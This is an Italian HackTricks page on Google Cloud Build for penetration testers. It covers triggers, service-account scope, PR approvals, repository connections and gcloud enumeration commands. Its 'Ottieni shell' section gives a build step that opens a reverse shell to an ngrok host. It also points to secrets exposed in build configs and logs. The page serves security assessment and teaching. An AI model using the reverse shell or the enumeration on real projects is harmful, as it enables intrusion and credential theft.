GCP - Cloud Build Enum

Support HackTricks

Basic Information

Google Cloud Build è una piattaforma CI/CD gestita che automazione i processi di build e rilascio del software, integrandosi con repository di codice sorgente e supportando un'ampia gamma di linguaggi di programmazione. Permette agli sviluppatori di costruire, testare e distribuire codice automaticamente fornendo flessibilità per personalizzare i passaggi di build e i flussi di lavoro.

Ogni Trigger di Cloud Build è collegato a un Cloud Repository o direttamente connesso a un repository esterno (Github, Bitbucket e Gitlab).

Non ho trovato alcun modo per rubare il token di Github/Bitbucket da qui o dai Cloud Repositories perché quando il repo viene scaricato viene accesso tramite un URL https://source.cloud.google.com/ e Github non è accessibile dal client.

Events

Il Cloud Build può essere attivato se:

  • Push su un branch: Specificare il branch

  • Push di un nuovo tag: Specificare il tag

  • Pull request: Specificare il branch che riceve il PR

  • Invocazione manuale

  • Messaggio Pub/Sub: Specificare il topic

  • Evento Webhook: Esporrà un URL HTTPS e la richiesta deve essere autenticata con un segreto

Execution

Ci sono 3 opzioni:

  • Un yaml/json che specifica i comandi da eseguire. Di solito: /cloudbuild.yaml

  • Solo uno che può essere specificato “inline” nella console web e nella cli

  • Opzione più comune

  • Rilevante per accesso non autenticato

  • Un Dockerfile da costruire

  • Un Buildpack da costruire

SA Permissions

Il Service Account ha l'ambito cloud-platform, quindi può utilizzare tutti i privilegi. Se non viene specificato alcun SA (come quando si fa submit) verrà utilizzato il SA predefinito <proj-number>@cloudbuild.gserviceaccount.com.

Per impostazione predefinita, non vengono concessi permessi, ma è abbastanza facile concederne alcuni:

Approvals

È possibile configurare un Cloud Build per richiedere approvazioni per le esecuzioni di build (disabilitato per impostazione predefinita).

PR Approvals

Quando il trigger è PR perché chiunque può eseguire PR su repository pubblici sarebbe molto pericoloso consentire l'esecuzione del trigger con qualsiasi PR. Pertanto, per impostazione predefinita, l'esecuzione sarà automatica solo per i proprietari e i collaboratori, e per eseguire il trigger con PR di altri utenti un proprietario o collaboratore deve commentare /gcbrun.

Connections & Repositories

Le connessioni possono essere create su:

  • GitHub: Mostrerà un prompt OAuth che chiede permessi per ottenere un token Github che sarà memorizzato all'interno del Secret Manager.

  • GitHub Enterprise: Chiederà di installare un GithubApp. Un token di autenticazione dal tuo host GitHub Enterprise sarà creato e memorizzato in questo progetto come un segreto del Secret Manager.

  • GitLab / Enterprise: Devi fornire il token di accesso API e il token di accesso API di lettura che saranno memorizzati nel Secret Manager.

Una volta generata una connessione, puoi usarla per collegare repository a cui l'account Github ha accesso.

Questa opzione è disponibile tramite il pulsante:

Nota che i repository collegati con questo metodo sono disponibili solo nei Trigger che utilizzano la 2a generazione.

Connect a Repository

Questo non è lo stesso di una connessione. Questo consente diversi modi per ottenere accesso a un repository Github o Bitbucket ma non genera un oggetto di connessione, ma genera un oggetto repository (di 1a generazione).

Questa opzione è disponibile tramite il pulsante:

Storage

A volte Cloud Build genera un nuovo storage per memorizzare i file per il trigger. Questo accade ad esempio nell'esempio che GCP offre con:

git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \
cd cloud-console-sample-build && \
gcloud builds submit --config cloudbuild.yaml --region=global

Un bucket di archiviazione chiamato security-devbox_cloudbuild è stato creato per memorizzare un .tgz con i file da utilizzare.

Ottieni shell

steps:
- name: bash
script: |
#!/usr/bin/env bash
bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/12395 0>&1
options:
logging: CLOUD_LOGGING_ONLY

Installa gcloud all'interno di cloud build:

# https://stackoverflow.com/questions/28372328/how-to-install-the-google-cloud-sdk-in-a-docker-image
curl https://dl.google.com/dl/cloudsdk/release/google-cloud-sdk.tar.gz > /tmp/google-cloud-sdk.tar.gz
mkdir -p /usr/local/gcloud
tar -C /usr/local/gcloud -xvf /tmp/google-cloud-sdk.tar.gz
/usr/local/gcloud/google-cloud-sdk/install.sh

Enumerazione

Potresti trovare informazioni sensibili nelle configurazioni di build e nei log.

# Get configured triggers configurations
gcloud builds triggers list # Check for the words github and bitbucket
gcloud builds triggers describe <trigger-name>

# Get build executions
gcloud builds list
gcloud builds describe <build-uuid> # Get even the build yaml if defined in there
gcloud builds log <build-uuid> # Get build logs

# List all connections of each region
regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
for region in $regions; do
echo "Listing build connections in region: $region"
connections=("${(@f)$(gcloud builds connections list --region="$region" --format='value(name)')}")
if [[ ${#connections[@]} -eq 0 ]]; then
echo "No connections found in region $region."
else
for connection in $connections; do
echo "Describing connection $connection in region $region"
gcloud builds connections describe "$connection" --region="$region"
echo "-----------------------------------------"
done
fi
echo "========================================="
done

# List all worker-pools
regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
for region in $regions; do
echo "Listing build worker-pools in region: $region"
gcloud builds worker-pools list --region="$region"
echo "-----------------------------------------"
done

Privilege Escalation

GCP - Cloudbuild Privesc

Accesso non autenticato

GCP - Cloud Build Unauthenticated Enum

Post Exploitation

GCP - Cloud Build Post Exploitation
Supporta HackTricks

Last updated